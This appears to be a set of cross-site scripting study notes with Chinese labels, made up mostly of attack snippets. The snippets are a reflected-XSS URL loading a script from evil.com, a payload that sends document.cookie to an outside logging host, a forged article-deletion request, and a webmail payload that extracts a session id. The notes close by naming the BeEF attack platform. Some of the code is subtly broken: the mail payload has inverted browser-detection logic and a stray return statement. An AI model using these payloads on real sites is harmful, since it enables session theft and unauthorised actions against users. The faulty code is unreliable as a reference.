http://www.a.com/test.html?abc="><script src=http://www.evil.com/evil.js></script>
窃取Cookie:
var img =document.createElement("img");
img.src="http://www.evil.com/log?"+escape(document.cookie);
document.body.appendChild(img);
执行删除文章:
var img=document.createElement("img");
img.src="http://...../delete$id=1";
document.body.appendChild(img);
XSS Payload mail:
if (top.window.location.href.indexOf("sid=")>0){
var sid= top.window.location.href.substr(top.window.location.href.indexOf("sid=")+4,24);}
var ajax=null;
if(window.XMLHttpRequest){ajax=new ActiveXObject("Microsoft.XMLHTTP");
}
else{
return;
}
ajax.open("GET",folder_url,true);
ajax.send(null);
ajax.onreadystatechange = function() {
if(ajax.readystate==4 && ajax.status==200){
alert(ajax.responseText);
//document.write(ajax.responseText)
}
}
XSS 攻击平台:
BeEF